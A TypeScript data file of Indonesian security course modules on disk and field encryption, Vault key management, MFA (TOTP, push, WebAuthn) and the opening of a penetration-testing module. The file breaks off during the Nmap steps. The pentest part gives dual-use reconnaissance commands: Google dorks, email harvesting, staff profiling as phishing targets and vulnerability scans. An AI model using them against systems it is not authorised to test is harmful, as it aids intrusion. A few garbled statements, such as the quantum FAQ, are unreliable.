// CyberEd — Materi Pertahanan Batch 2: Encryption at Rest, MFA, Pentesting, Incident Response
// Double-quote outer string + escape \" untuk inner quotes
import type { MateriData } from "../materi-content/runner";

export const pertahanan2: MateriData[] = [
  // ============================ ENCRYPTION AT REST ============================
  {
    judul: "🔐 Encryption at Rest — Lindungi Data Saat Diam di Disk",
    emoji: "🔐",
    deskripsi: "Pelajari setup LUKS full disk encryption di Linux, BitLocker di Windows, application-level encryption untuk database, dan manajemen key.",
    level: "menengah",
    harga: 20000,
    hargaCoret: 30000,
    isGratis: false,
    tipe: "pertahanan",
    tujuan: "Kamu paham konsep symmetric vs asymmetric encryption, mampu setup LUKS di Linux dan BitLocker di Windows, dan tahu praktik baik manajemen Kunci.",
    analogy: "Bayangkan brankas di rumah. Encryption = tidak cukup hanya dengan gembok standar - brankas yang bagus adalah yang kalau dibongkar paksa, isinya hancur.",
    apaItu: "Encryption at Rest adalah proses mengenkripsi data yang disimpan (di disk, database, backup) supaya kalau ada pihak yang physical access ke storage medium, mereka tidak bisa read raw data tanpa decryption key.\n\nTiga lapisan:\n1) Full Disk Encryption (FDE): encrypt seluruh block device - LUKS di Linux, BitLocker di Windows\n2) Volume / Partition Encryption: subset dari disk - VeraCrypt\n3) Application-level Encryption: encrypt field tertentu di aplikasi (PII, password hash)",
    caraKerja: "Symmetric encryption (AES-256-GCM):\n1) Generate random 256-bit key (K)\n2) Encrypted data = AES-GCM(K, plaintext) -> ciphertext\n3) Decryption = AES-GCM-decrypt(K, ciphertext) -> plaintext\n\nKey harus disimpan AMAN: HSM, KMS (AWS KMS, HashiCorp Vault), atau encrypted key vault.\n\nAsymmetric (RSA, ECC): untuk keypair exchange. Umumnya hybrid: RSA untuk tukar symmetric AES key.",
    asciiDiagram: "ENCRYPT-THEN-STORE:\n  Data asli -> AES_Encrypt(K, data) -> Ciphertext -> tulis ke disk\n  K -> disimpan encrypted dengan master key di KMS/HSM\n\nDECRYPT-ON-READ:\n  Read disk -> Ciphertext -> AES_Decrypt(K, ciphertext) -> Data -> process\n\nKEY HIERARCHY:\n  Master Key (HSM root)\n   └── Data Encryption Keys (per record/partition)\n        └── encrypted data",
    senjata: { pc: "Linux: cryptsetup + LUKS (built-in). Windows: BitLocker (built-in Pro/Enterprise). Tools KMS: HashiCorp Vault, AWS KMS, Azure Key Vault. Library: OpenSSL, libsodium, PyNaCl.", hp: "Android: built-in device encryption (default ON sejak Android 5). iOS: hardware-rooted encryption." },
    metode: [
      {
        nama: "Metode 1: Setup LUKS Full Disk Encryption di Linux (Pemula)",
        level: "pemula",
        deskripsi: "LUKS adalah standard Linux unified key setup. Setup pada partisi kosong + install OS baru di partisi encrypted.",
        prasyarat: ["Linux instalasi medium (Ubuntu live USB)", "Partisi kosong", "Backup data: encrypt akan FORMAT partisi"],
        langkah: [
          { judul: "Install Ubuntu dengan LUKS built-in", aksi: "Kalian download Ubuntu ISO terbaru. Saat install, pilih Erase disk and install Ubuntu -> centang Encrypt the new Ubuntu installation for security -> set passphrase kuat. Installer otomatis configure LUKS + LVM + ext4 fs encrypted.", expected: "Instalasi selesai dengan LUKS encrypted volume. Boot akan minta passphrase." },
          { judul: "Setup LUKS pada data partition (existing system)", aksi: "Untuk partisi data kosong yang sudah ada di system, setup LUKS manual:\nsudo cryptsetup luksFormat /dev/sdb1\n-> akan confirm: WARNING!! This will overwrite data. Type YES uppercase.\nBuka:\nsudo cryptsetup open /dev/sdb1 mydata -> masukkan passphrase -> volume mapped ke /dev/mapper/mydata.", command: "sudo cryptsetup luksFormat /dev/sdb1\nsudo cryptsetup open /dev/sdb1 mydata", expected: "LUKS partition created + opened. /dev/mapper/mydata ready." },
          { judul: "Buat filesystem di LUKS volume + mount", aksi: "Setelah open, format dengan ext4:\nsudo mkfs.ext4 /dev/mapper/mydata\nMount:\nsudo mkdir /mnt/encrypted\nsudo mount /dev/mapper/mydata /mnt/encrypted\nSekarang /mnt/encrypted ready - semua data written akan auto-encrypt.", command: "sudo mkfs.ext4 /dev/mapper/mydata\nsudo mkdir /mnt/encrypted\nsudo mount /dev/mapper/mydata /mnt/encrypted", expected: "Filesystem created. Mounted hanya accessible setelah passphrase." },
          { judul: "Auto-unlock di boot via /etc/crypttab", aksi: "Untuk convenience, auto-unlock di boot dengan key file:\n1) Generate key: sudo dd if=/dev/urandom of=/etc/luks-keys/mydata.key bs=512 count=8\n2) Add key: sudo cryptsetup luksAddKey /dev/sdb1 /etc/luks-keys/mydata.key\n3) Edit /etc/crypttab: tambah baris: mydata /dev/sdb1 /etc/luks-keys/mydata.key luks\n4) Edit /etc/fstab: /dev/mapper/mydata /mnt/encrypted ext4 defaults 0 2", command: "cat /etc/crypttab", expected: "File crypttab berisi entry untuk auto-open pada boot." },
          { judul: "Verifikasi: try read raw device", aksi: "Verify encryption works:\nsudo dumpe2fs /dev/sdb1 | head -> Output: Bad magic number\nhexdump -C /dev/sdb1 | head -> cuma noise acak.\nData tidak readable tanpa key.", command: "sudo dumpe2fs /dev/sdb1 2>&1\nhexdump -C /dev/sdb1 | head", expected: "LUKS header detected. Raw data tidak readable. Enkripsi terbukti." },
        ],
        outputAkhir: "Berhasil setup LUKS full disk encryption + auto-unlock di boot.",
        kesalahanUmum: [
          { masalah: "Lupa passphrase LUKS -> data hilang total", solusi: "Backup passphrase OFFLINE di kertas di lokasi aman. LUKS tidak punya recovery built-in." },
          { masalah: "Auto-unlock tidak jalan setelah reboot", solusi: "Update initramfs: sudo update-initramfs -u. crypttab dan fstab harus benar format." },
        ],
      },
      {
        nama: "Metode 2: Application-Level AES-GCM untuk Field PII (Menengah)",
        level: "menengah",
        deskripsi: "Untuk PII atau data krusial di aplikasi (password, NIK, kartu kredit), encrypt field-by-field dengan library symmetric encryption, simpan key di KMS.",
        prasyarat: ["Node.js atau Python dengan library crypto", "Random key 256-bit (generate pakai /dev/urandom atau KMS)"],
        langkah: [
          {
            judul: "Generate master key",
            aksi: "Kalian generate key dari CSPRNG. Di Node.js:\nconst { randomBytes } = require('crypto');\nconst key = randomBytes(32);  // 256-bit\n\nKey ini RAHASIA - jangan pernah log atau commit ke git. Simpan di env var atau KMS.",
            command: "node -e \"console.log(require('crypto').randomBytes(32).toString('hex'))\"",
            expected: "64-char hex string (256-bit) tercetak.",
          },
          {
            judul: "Encrypt dengan AES-256-GCM",
            aksi: "AES-GCM memberikan confidentiality + integrity. Node.js:\nconst { createCipheriv } = require('crypto');\nfunction encrypt(plaintext, key) {\n  const iv = randomBytes(12);  // 96-bit IV untuk GCM\n  const cipher = createCipheriv('aes-256-gcm', key, iv);\n  const encrypted = Buffer.concat([cipher.update(plaintext, 'utf8'), cipher.final()]);\n  const tag = cipher.getAuthTag();\n  return { iv: iv.toString('hex'), encrypted: encrypted.toString('hex'), tag: tag.toString('hex') };\n}\n\nSimpan IV + encrypted + tag. Dekripsi sama dengan key + iv + tag.",
            command: "node -e \"const c = require('crypto').createCipheriv('aes-256-gcm', Buffer.from('a1b2c3d4e5f6'.repeat(4).slice(0,32)), Buffer.from('123456789012')); console.log(c.update('hello', 'utf8').toString('hex'))\"",
            expected: "Encryption function returns object with iv/encrypted/tag.",
          },
          {
            judul: "Schema database untuk encrypted fields",
            aksi: "Schema database:\nCREATE TABLE users (id TEXT PRIMARY KEY, email TEXT UNIQUE, password_hash TEXT, nik_encrypted TEXT, nik_iv TEXT, nik_tag TEXT);\n\nPisahkan IV dan tag agar bisa decrypt ulang. Atau gabungkan jadi 1 blob base64.\n\nUntuk password hash, JANGAN encrypt reversible - pakai bcrypt (one-way).",
            expected: "Schema dengan separate fields untuk encrypted data + IV + tag.",
          },
          {
            judul: "Decrypt on read",
            aksi: "Reverse process: parse IV + ciphertext + tag. Pakai createDecipheriv dengan authTag. Kalau tag tidak valid (data modified) -> throw error.",
            command: "node -e \"const d = require('crypto').createDecipheriv('aes-256-gcm', key, iv); d.setAuthTag(tag); console.log(d.update(encrypted, 'hex', 'utf8') + d.final('utf8'))\"",
            expected: "Decryption returns plaintext. Tampered data throws error.",
          },
        ],
        outputAkhir: "AES-256-GCM untuk PII encrypt/decrypt. Key disimpan terpisah. Authentication tag deteksi tampering.",
        kesalahanUmum: [
          { masalah: "Pakai ECB mode atau static IV", solusi: "ECB = dapat di-pattern match. Pakai GCM atau CBC + HMAC. IV harus random per record." },
          { masalah: "Key tersimpan di source code atau .env di git", solusi: "Pakai KMS atau env var dari secret manager. Jangan pernah hardcode." },
        ],
      },
      {
        nama: "Metode 3: Key Management dengan HashiCorp Vault",
        level: "lanjut",
        deskripsi: "Vault adalah secret manager open source. Simpan encryption keys, credential API, dan menyediakan audit log akses.",
        prasyarat: ["Linux server (atau Docker)", "Vault binary atau container image"],
        langkah: [
          { judul: "Install Vault via Docker (dev mode)", aksi: "Kalian untuk lab, pakai Docker dev mode:\ndocker run -d --name vault -p 8200:8200 -e VAULT_DEV_ROOT_TOKEN_ID=root hashicorp/vault\nServer jalan di 8200. Token root untuk full access (jangan pakai di prod).", command: "docker run -d --name vault -p 8200:8200 -e VAULT_DEV_ROOT_TOKEN_ID=root hashicorp/vault", expected: "Vault running. Web UI di http://localhost:8200." },
          { judul: "Setup Key/Value secret engine", aksi: "Login:\nexport VAULT_ADDR=http://localhost:8200\nexport VAULT_TOKEN=root\nAktifkan KV engine:\nvault secrets enable -version=2 kv\nSekarang bisa simpan key:\nvault kv put kv/myapp/encryption key=xxx_hex_string", command: "vault kv put kv/myapp/encryption key=$(node -e \"console.log(require('crypto').randomBytes(32).toString('hex'))\")", expected: "Secret tersimpan di Vault KV engine." },
          { judul: "App pakai Vault untuk fetch key", aksi: "App code ambil key from Vault instead of hardcoded env. Node.js pakai fetch:\nfetch('http://localhost:8200/v1/kv/data/myapp/encryption', {headers: {'X-Vault-Token': 'root'}})\n  .then(r => r.json())\n  .then(j => console.log(j.data.data.key))\n\nSekarang app encrypt/decrypt pakai key dari Vault. Vault audit log setiap akses.", command: "node -e \"fetch('http://localhost:8200/v1/kv/data/myapp/encryption', {headers: {'X-Vault-Token': 'root'}}).then(r=>r.json()).then(j=>console.log(j.data.data.key))\"", expected: "App retrieves key from Vault at runtime." },
          { judul: "Transit engine untuk auto encryption", aksi: "Vault punya transit engine untuk auto encryption/decryption client-side.\nEnable:\nvault secrets enable transit\nCreate keyed key:\nvault write -f transit/keys/myapp-key type=aes256-gcm96\nEncrypt:\nvault write transit/encrypt/myapp-key plaintext=base64-encoded-data\n\nKey tetap di Vault. App kirim plaintext, Vault encrypt dan return ciphertext.", command: "vault write transit/encrypt/myapp-key plaintext=$(base64 <<< hello)", expected: "Encryption via Vault transit engine. Key tetap di Vault." },
        ],
        outputAkhir: "Berhasil setup Vault untuk secret management + transit engine encryption.",
        kesalahanUmum: [
          { masalah: "Vault token bocor", solusi: "Token dipakai dari auth method (AppRole, AWS IAM, K8s service account) - bukan hardcoded." },
          { masalah: "Vault dev mode dipakai di prod", solusi: "Dev mode = memory storage. Prod: hafiz mode, multi-unseal key shares, persistent storage." },
        ],
      },
    ],
    mitigasi: "Pertahanan encryption berlapis: AES-256-GCM (authenticated) untuk symmetric, RSA-2048+ atau ECC P-256 untuk asymmetric, Key rotation berkala (6-12 bulan), Key Storage di HSM atau KMS, Backup offline keys, NaCl/libsodium modern jangan roll-your-own crypto, Constant-time comparison libs, Compliance PCI-DSS/HIPAA/GDPR.",
    latihan: ["Setup Ubuntu dengan LUKS FDE di VM. Boot -> test passphrase prompt. Verifikasi raw disk tidak readable.", "Tulis app Node.js dengan AES-GCM encryption untuk field PII. Store di SQLite.", "Setup HashiCorp Vault via Docker. Aktifkan transit engine. App pakai Vault untuk encrypt PII.", "Latihan full key rotation cycle: generate key terrotate, re-encrypt data, verify decryption works dengan kedua key."],
    faq: [
      { q: "Berapa panjang key yang ideal?", a: "AES-256 (256-bit key) standard modern. Kekuatan 2^256 kombinasi. Butuh quantum computer untuk brute force." },
      { q: "Apakah perlu TPM untuk FDE?", a: "TPM (Trusted Platform Module) simpan key di hardware chip. Lebih resisten dari attack. TPM 2.0 + BitLocker + PIN startup ideal untuk laptop enterprise." },
      { q: "Bagaimana dengan quantum computers?", a: "Quantum (kalau nanti ada) akan rentan RSA-2048 dan AES-256 perlu dikurangi ke AES-128. Post-quantum cryptography (PQC) sudah muncul di NIST." },
      { q: "Apakah encryption membuat data benar-benar aman?", a: "Tidak - encryption hanya melindungi at-rest. Kalau attacker punya access ke running app + key di memory, encryption tidak bantu." },
    ],
    ringkasan: ["Encryption at rest = data tidak readable tanpa key", "FDE (LUKS, BitLocker) = full disk protection", "Application-level (AES-GCM) = field-level PII protection", "KMS / Vault = centralized key storage + audit", "AES-256-GCM modern, RSA-2048+ untuk asymmetric", "Quantum consideration: watch PQC development"],
    materiRelated: ["MFA", "Incident Response", "Secure Coding"],
  } as MateriData,

  // ============================ MULTI-FACTOR AUTHENTICATION (MFA) ============================
  {
    judul: "🔑 Multi-Factor Authentication (MFA) — Tambah Lapisan Login Security",
    emoji: "🔑",
    deskripsi: "Pelajari setup TOTP (Google Authenticator), WebAuthn/FIDO2 security key (YubiKey), push notification MFA, dan SMS OTP yang masih umum dipakai.",
    level: "menengah",
    harga: 18000,
    hargaCoret: 28000,
    isGratis: false,
    tipe: "pertahanan",
    tujuan: "Kamu paham konsep factor authentication (know/have/are), mampu deploy TOTP MFA + push MFA, dan tahu defense vs phishing via FIDO2.",
    analogy: "Bayangkan rumah dengan 3 lapis kunci: konvensional, alarm dengan PIN, dan biometrik sidik jari. Maling perlu bypass semua lapis - jauh lebih sulit.",
    apaItu: "Multi-Factor Authentication (MFA) adalah authentication yang memerlukan >= 2 dari 3 kategori factor:\n\n1) Something you KNOW: password, PIN, passphrase\n2) Something you HAVE: phone, hardware key, smart card\n3) Something you ARE: biometric (fingerprint, face, iris)\n\nMFA Block 99.9% attack automated. Tapi SIM swap, push fatigue, phishing mampu bypass weak MFA. FIDO2 security key dirancang anti-phishing.",
    caraKerja: "Flow typical login + MFA:\n1) User Submit username + password (Layer 1)\n2) Server verify -> if OK, challenge MFA\n3) User TOTP / push / hardware key (Layer 2)\n4) Server verify -> jika OK, login granted\n\nJenis MFA:\n- TOTP: generate kode 6-digit setiap 30 detik pakai secret shared + waktu\n- SMS OTP: kode via SMS. Rentan SIM swap\n- Push notification: app dorong notifikasi, user tap approve. Rentan push fatigue\n- WebAuthn / FIDO2: hardware key / built-in biometric. Anti-phishing by design",
    asciiDiagram: "LOGIN DENGAN MFA:\n  Browser: POST /login -> username + password\n  Server: cek password -> valid\n  Server: Generate challenge -> kirim OTP ke user phone / push\n  Server: Tunggu OTP response -> max 60s\n  Browser: user input OTP / push approve\n  Server: cek OTP valid -> if OK, set session cookie + redirect success\n\nFIDO2 FLOW:\n  Server: kirim challenge ke browser\n  Authenticator: User touch (atau biometric verify)\n  Authenticator: Sign challenge dengan private key locked in hardware\n  Server: verify signature dengan stored public key -> valid jika OK\n\nFIDO2 win: signature includes origin domain -> AitM phishing gagal.",
    senjata: { pc: "Google Authenticator (TOTP), Authy (cloud sync TOTP), YubiKey (FIDO2 hardware key), Bitwarden / 1Password (password manager + TOTP built-in), Microsoft Authenticator (push). Libraries: otplib (Node.js), pyotp (Python).", hp: "Google Authenticator app, Microsoft Authenticator (push), YubiKey dengan NFC tap-to-phone. Built-in: Android fingerprint, iOS Face/Touch ID." },
    metode: [
      {
        nama: "Metode 1: Setup TOTP MFA untuk Aplikasi",
        level: "pemula",
        deskripsi: "TOTP adalah MFA paling umum dan relative simple untuk implementasi.",
        prasyarat: ["App Node.js / Python existing", "Library TOTP: otplib (JS) atau pyotp (Python)"],
        langkah: [
          { judul: "Library install", aksi: "Kalian install library:\nnpm install otplib\nAtau Python:\npip install pyotp qrcode", command: "npm install otplib\npip install pyotp qrcode", expected: "Library terinstall." },
          { judul: "Generate TOTP secret untuk user", aksi: "Saat user enable MFA: generate secret random:\nconst { authenticator } = require('otplib');\nconst secret = authenticator.generateSecret();\n-> string base32 (misal: JBSWY3DPEHPK3PXP)\nSimpan secret di database user (jangan log).", command: "node -e \"console.log(require('otplib').authenticator.generateSecret())\"", expected: "Secret base32 tercetak (~32 char)." },
          { judul: "Generate QR code untuk user scan dengan Authenticator", aksi: "Kalian buat QR:\nconst otpauth = authenticator.keyuri(userEmail, 'MyApp', secret);\nconst QRCode = require('qrcode');\nQRCode.toFile('qr.png', otpauth, function(err) { console.log('QR saved'); });\n\nURL Format: otpauth://totp/MyApp:email@domain.com?secret=JBSWY3DPEHPK3PXP&issuer=MyApp\nTampilkan QR atau download untuk user scan di Google Authenticator.", command: "node -e \"const a = require('otplib').authenticator; require('qrcode').toFile('qr.png', a.keyuri('user@example.com', 'MyApp', 'JBSWY3DPEHPK3PXP'))\"", expected: "QR file qr.png terbuat. User scan di Google Authenticator app." },
          { judul: "Verify TOTP code saat login", aksi: "Setelah user scan QR, app harus verify kode yang mereka submit:\nconst isValid = authenticator.verify({ token: userSubmittedCode, secret: storedSecret });\n// returns true or false\nAtau dengan window tolerance:\nconst isValidWindow = authenticator.check(userSubmittedCode, storedSecret, { window: 1 });\n// accept within +-30 detik (window 1 = current+previous)", command: "node -e \"const a = require('otplib').authenticator; console.log(a.check('123456', 'JBSWY3DPEHPK3PXP', {window: 1}))\"", expected: "Boolean true kalau kode valid." },
          { judul: "Generate backup codes", aksi: "Generate 10 single-use codes sebagai backup. Saat user kehilangan device, mereka bisa pakai backup code.\nImplement: hash codes (jangan plain text) simpan di DB. Saat kode dipakai, hapus dari DB.\nCrypto.randomBytes(16).toString('hex')\\nCrypt output: 10 codes dari wordlist secure random.", command: "node -e \"console.log([...Array(10)].map(() => require('crypto').randomBytes(4).toString('hex')).join('\\\\n'))\"", expected: "10 backup codes tercetak." },
        ],
        outputAkhir: "Setup TOTP MFA end-to-end: secret generation, QR enrollment, verify on login, backup codes.",
        kesalahanUmum: [
          { masalah: "Kode verify selalu return false", solusi: "Pastikan server time sync (NTP). TOTP berdasarkan current timestamp." },
          { masalah: "User tidak bisa pakai authenticator app", solusi: "Berikan download link + instruksi jelas. Atau sediakan backup codes." },
          { masalah: "Backup code bocor", solusi: "Hash backup codes di server. Saat user pakai, mark as used (hapus dari DB)." },
        ],
      },
      {
        nama: "Metode 2: Push Notification MFA",
        level: "menengah",
        deskripsi: "Push MFA kirim notifikasi ke device user setelah login. User tap Approve atau Deny dari notification. Lebih UX-friendly dari TOTP.",
        prasyarat: ["Mobile app (push notification support)", "Server dengan Firebase Cloud Messaging (FCM) atau APNS"],
        langkah: [
          { judul: "Setup FCM (Firebase) di server", aksi: "Buat Firebase project -> enable Cloud Messaging -> download service account JSON key. Backend Node.js:\nimport admin from 'firebase-admin';\nadmin.initializeApp({ credential: admin.credential.cert(serviceAccount) });", expected: "FCM initialized di server." },
          { judul: "Trigger push setelah login attempt", aksi: "Setelah user submit password + valid -> generate random challenge ID, kirim push:\nadmin.messaging().send({ token: user.fcm_token, notification: { title: 'MyApp Login', body: 'Is this you? Tap Approve' }, data: { challenge_id: 'abc123' } });\n\nUser Terima di HP.", command: "admin.messaging().send({ token: user.fcm_token, notification: { title: 'MyApp Login', body: 'Is this you?' }, data: { challenge_id: 'abc123' } })", expected: "Push notification dikirim. User Terima." },
          { judul: "Approve / Deny dari app mobile", aksi: "Mobile app Terima push -> tap Approve -> app POST ke server dengan challenge_id + device signature. Server verify challenge match -> login granted. Deny -> login blocked + notify user email.", expected: "App handles push, sends approve response to backend." },
          { judul: "Anti push-fatigue: risk-based", aksi: "Implementasi cerdas: hanya push MFA kalau login dari device/IP yang tidak dikenal. Trusted device (cookie remember) -> skip MFA. Login dari negara baru + device nggak dikenal -> push + tambah password re-confirm.", expected: "Risk-based MFA logic implemented." },
        ],
        outputAkhir: "Berhasil setup push MFA end-to-end: trigger FCM setelah login, app handle approve/deny, risk-based triggers.",
        kesalahanUmum: [
          { masalah: "Push fatigue attack (attacker spam login 100x -> user tap Approve by accident)", solusi: "Risk-based triggers, require PIN/biometric untuk approve, atau pakai hardware key untuk sensitive ops." },
          { masalah: "User push notification mati", solusi: "Selalu punya fallback: TOTP, backup codes, atau security questions." },
        ],
      },
      {
        nama: "Metode 3: FIDO2 WebAuthn Anti-Phishing",
        level: "lanjut",
        deskripsi: "FIDO2 adalah highest-security MFA - berbasis hardware key atau built-in biometric. Tidak bisa AitM bypass karena signature proves origin domain.",
        prasyarat: ["Backend Node.js / Python dengan library WebAuthn", "YubiKey atau device dengan Touch ID / Windows Hello"],
        langkah: [
          { judul: "Library WebAuthn + struktur", aksi: "Konsep penting:\n- Credential ID: identifier untuk registered authenticator\n- Public key: disimpan di server untuk verify nanti\n- Challenge: random string yang authenticator signs\n- Origin: URL page yang minta signature (anti-phishing)\n\nInstall: npm install @simplewebauthn/server @simplewebauthn/browser", expected: "Library terinstall." },
          { judul: "Registration: user enroll YubiKey", aksi: "Generate challenge: random 32 bytes. Front-end minta authenticator create credential:\nconst credential = await navigator.credentials.create({ publicKey: { challenge: ... , rp: { name: 'MyApp', id: 'myapp.com' }, user: { id: userId, name: email, displayName: email }, pubKeyCredParams: [{ type: 'public-key', alg: -7 }] } });\n\nAuthenticator generate keypair + return credential public key. Server simpan.", expected: "YubiKey touch + biometric. Credential registered." },
          { judul: "Login: verify signature", aksi: "Saat login, server generate new challenge. Front-end minta authenticator sign:\nconst assertion = await navigator.credentials.get({ publicKey: { challenge: ..., allowCredentials: [{ id: credentialId, type: 'public-key' }] } });\n\nAuthenticator minta user touch / biometric, sign challenge, dan tambah extension origin ke signature.\nServer verify signature dengan stored public key. Valid -> login ok.", expected: "User touch YubiKey -> signature verified -> login sukses. Anti-phishing karena domain included." },
          { judul: "Anti-phishing verification", aksi: "Coba phishing test: aksi clone page server Anda di domain berbeda (evil.com). Front-end request ke authenticator akan sertakan origin = evil.com. Authenticator hanya tanda tangan untuk origin = myapp.com (registered saat registrasi). Result: signature tidak valid di server -> login gagal -> AitM phish gagal bypass.", expected: "Phishing test failed: YubiKey refuses untuk evil domain." },
        ],
        outputAkhir: "Berhasil implementasi FIDO2 WebAuthn + prove anti-phishing AITM-resistant.",
        kesalahanUmum: [
          { masalah: "YubiKey hilang -> user tidak bisa login", solusi: "Daftarkan 2 YubiKey per user (primary + backup). Backup disimpan di lokasi aman. Atau TOTP fallback." },
          { masalah: "Browser tidak support WebAuthn", solusi: "Fall back otomatis ke TOTP/SMS. Modern browser semua support WebAuthn sejak 2018." },
        ],
      },
    ],
    mitigasi: "Pertahanan dari MFA bypass: Prioritaskan FIDO2 / WebAuthn, SMS OTP avoidable untuk low-security fallback, Backup offline, Risk-based triggers (extra MFA for suspicious login), Stay informed user (notifikasi untuk semua login attempts), Admin accounts admin/root harus pakai FIDO2, Session binding correlate (TOTP/push bound to device fingerprint).",
    latihan: ["Setup TOTP MFA di app lab Anda. Test di Google Authenticator. Verify window tolerance.", "Daftarkan 2 akun Microsoft / GitHub dengan FIDO2. Test dengan 2 YubiKey.", "Buat lab phish clone. Coba login account FIDO2 Anda via clone -> observe failure.", "Setup fallback chain FIDO2 -> push -> TOTP -> backup codes."],
    faq: [
      { q: "SMS OTP cukup atau pakai TOTP?", a: "TOTP jauh lebih aman. SIM swap rentan SMS. Gunakan TOTP minimal, idealnya tidak dipakai.s" },
      { q: "Push MFA lebih aman dari TOTP?", a: "Push MFA lebih user-friendly tapi risk fatigue attack. TOTP kode-input sedikit lebih ribet tapi attacker tidak dapat spam." },
      { q: "Apakah FIDO2 anti-phishing?", a: "Anti-phishing BY DESIGN. Signature cryptographic tied ke origin domain. AitM gagal." },
      { q: "Passkey itu apa hubungannya dengan FIDO2?", a: "Passkey = implementasi FIDO2 untuk consumer-friendly. Sync via Apple iCloud Keychain / Google Password Manager. Tetap anti-phishing." },
    ],
    ringkasan: ["MFA block 99.9% automated attack", "Jenis: TOTP, push, SMS, FIDO2/WebAuthn, backup codes", "Ranking keamanan: FIDO2 > TOTP > push > SMS", "FIDO2 anti-phishing by design", "Always backup: 2 YubiKey atau backup codes offline", "Risk-based MFA untuk suspicious login"],
    materiRelated: ["Encryption at Rest", "Incident Response", "Secure Coding", "Session Hijacking"],
  } as MateriData,

  // ============================ PENETRATION TESTING ============================
  {
    judul: "🎯 Penetration Testing Methodology — Standar Profesional Audit Keamanan",
    emoji: "🎯",
    deskripsi: "Pelajari pentest methodology dari reconnaissance sampai reporting, tools standar industri (Nmap, Burp, Metasploit), dan framework laporan.",
    level: "sulit",
    harga: 25000,
    hargaCoret: 35000,
    isGratis: false,
    tipe: "pertahanan",
    tujuan: "Kamu paham pentest lifecycle (reconnaissance, scanning, exploitation, reporting), mampu jalan pentest dasar di lab, dan menulis laporan yang bernilai bagi klien.",
    analogy: "Bayangkan tukang kunci professional. Mereka tidak masuk seenaknya - pakai prosedur: inspect kunci rumah secara keseluruhan, identifikasi titik lemah, dokumentasikan, baru tunjukkan ke owner. Pentest persis - prosedur terstruktur untuk identifikasi + exploit responsibly.",
    apaItu: "Penetration Testing (Pentest) adalah simulasi attack berizin terhadap sistem untuk identifikasi kerentanan security. Pentester meniru teknik attacker, dokumentasikan finding, lalu laporkan ke klien untuk di-fix.\n\nJenis:\n- Black Box: pentester tidak tahu apapun tentang sistem (simulasi external attacker)\n- Gray Box: pentester punya partial info\n- White Box: pentester punya full access (source code, network diagrams)\n\nStandar methodologies: PTES, OWASP Testing Guide, NIST SP 800-115, OSSTMM.",
    caraKerja: "5 phase Pentesting Methodology (PTES):\n1) Intelligence Gathering: OSINT, search engine, social media, network recon\n2) Threat Modeling: identifikasi aset krusial, attack surface, threat actor profile\n3) Vulnerability Analysis: scan (Nmap, Nessus, Burp), manual test, prioritas\n4) Exploitation: exploit vulnerability identified, demonstrate impact\n5) Reporting: dokumentasikan finding, business impact, remediation\n\nPlus: pre-engagement (scope, rules of engagement) + post-engagement (re-test fix).",
    asciiDiagram: "PENTEST LIFECYCLE:\n\n  [Pre-Engagement]\n       | scope, contract, ROE, NDA\n       v\n  [1. Intelligence Gathering]\n       | OSINT, DNS, whois\n       v\n  [2. Threat Modeling]\n       | attack surface\n       v\n  [3. Vulnerability Analysis]\n       | scan + manual test\n       v\n  [4. Exploitation]\n       | exploit + escalation + pivot\n       v\n  [5. Reporting]\n       | executive summary + technical findings\n       v\n  [Post-Engagement]\n    retest fix + debrief",
    senjata: { pc: "Kali Linux (distro pentest dengan 600+ tools). Tools utama: Nmap (port scan), Burp Suite Pro (web app), Metasploit (exploitation framework), Nessus / OpenVAS (vulnerability scanner), Wireshark (sniffing), John / Hashcat (password cracker), GoPhish (phishing sim), BloodHound (AD recon).", hp: "Termux untuk tool sederhana. Pentest profesional full butuh Kali VM." },
    metode: [
      {
        nama: "Metode 1: Reconnaissance Pasif (OSINT) untuk Target",
        level: "pemula",
        deskripsi: "OSINT (Open Source Intelligence) - informasi publik tanpa touch target langsung. Zero detection risk.",
        prasyarat: ["Target domain (lab)", "Internet access"],
        langkah: [
          { judul: "WHOIS + DNS enumeration", aksi: "Kalian buka terminal. WHOIS lookup:\nwhois target-domain.com -> info registrant, nameserver, tanggal registrasi.\nDNS:\ndig +short ANY target-domain.com -> semua record.\nDNS subdomain brute: gunakan subfinder atau sublist3r.", command: "whois target-domain.com\ndig +short ANY target-domain.com\nsubfinder -d target-domain.com", expected: "WHOIS + DNS records + list subdomain candidate." },
          { judul: "Google Dorking untuk sensitive pages", aksi: "Pakai Google Dorks:\nsite:target.com filetype:pdf confidential\nsite:target.com inurl:admin\nsite:target.com inurl:login\nsite:target.com intitle:index of Banyak sensitive path bisa ter-expose.", expected: "URL sensitive yang indexed Google muncul." },
          { judul: "Email harvesting dengan theHarvester", aksi: "Tools: theHarvester. Menggunakan search engine + PGP keyservers untuk collect email addresses:\ntheHarvester -d target-domain.com -b google -l 500\nOutput: daftar email + subdomain.", command: "theHarvester -d target-domain.com -b google -l 500", expected: "Email format employee, plus subdomain list." },
          { judul: "LinkedIn OSINT", aksi: "Cek employee target via LinkedIn (no login required). Identifikasi role (security admin, sysadmin -> potential phishing target). Cek post history untuk potential information leaks.", expected: "Daftar employee + role + tech stack inferred." },
        ],
        outputAkhir: "Berhasil OSINT: list subdomain, email, sensitive URL, employee role. Zero detection karena passive.",
        kesalahanUmum: [
          { masalah: "Subdomain enumeration lambat", solusi: "Tools: subfinder (passive) atau sublist3r (active bruteforce). Kombinasikan untuk coverage." },
          { masalah: "Tidak cukup info", solusi: "Passive OSINT selalu lebih banyak yang bisa di-dig: Shodan (IoT search), Censys (SSL cert search), GitHub (search code accidentally pushed)." },
        ],
      },
      {
        nama: "Metode 2: Active Scan + Vulnerability Analysis",
        level: "menengah",
        deskripsi: "Active scan touch target langsung - dapat IDS/IPS detection risk. Tools standar: Nmap, OpenVAS, Burp Active Scanner.",
        prasyarat: ["Kali Linux VM", "Target lab authorization", "Nmap terinstall"],
        langkah: [
          { judul: "Nmap port scan dengan service detection", aksi: "Kalian jalankan: nmap -sV -sC -A -p- target-ip.\n-sV = service version detection.\n-sC = default script scan.\n-A = OS detection + traceroute.\n-p- = scan semua 65535 port.", command: "nmap -sV -sC -A -p- 10.10.10.5", expected: "Daftar port + service + versi. Misal: 22/ssh OpenSSH 8.4, 80/http nginx 1.18, 443/https Apache 2.4.46." },
          { judul: "NSE script untuk vulnerability detection", aksi: "Nmap NSE punya ratusan script. Untuk vulnerability detection:\nnmap --script vuln -p 80,443 target\nScript vuln kategori dapat detect SMB vulnerabilities, http vulnerabilities, ssl issues, dll.", command: "nmap --script vuln -p 22,80,443 target", expected: "Output vulnerabilities detected." },
